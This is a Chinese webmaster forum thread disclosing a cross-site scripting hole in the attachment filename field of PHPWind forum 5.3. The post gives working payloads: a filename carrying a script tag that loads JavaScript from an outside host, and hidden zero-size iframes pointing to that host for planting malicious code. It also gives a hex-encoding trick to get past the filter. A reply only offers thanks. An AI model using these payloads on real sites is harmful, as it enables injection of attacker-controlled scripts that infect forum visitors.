浏览主站 | 站长工具 | 新闻资讯 | 站长学院 | 站长盈利 | HTML教程 | 网址导航 | 站长周刊 | 会员投稿 | 滚动新闻 | RSS
发新话题
打印

PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)

PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞(XSS)

require\postupload.php文件对atc_attachment_name变量过滤不严,导致跨站脚本执行漏洞,可能引起站点被嵌入恶意代码。


在附件处填写:
D:\badwolf:<SCRIPT SRC=http://www.liyingfei.com/a.js>XSS.rar (转换为ASSIC编码POST)


其实不用远程调用JS文件,也可以直接达到挂马的效果如下,本地测试环境:phpwind5.0.1

Copy code

D:\badwolf<iframe src=http://www.liyingfei.com/><%2Fiframe>XXS.rar

D:\badwolf<iframe src=http://www.liyingfei.com/test.htm width=0 height=0><%2Fiframe>XXS.rar

过滤了/和",构造语句如上。http://www.liyingfei.com/test.htm 十六进制编码即可

TOP

学习看了.......谢谢

TOP

发新话题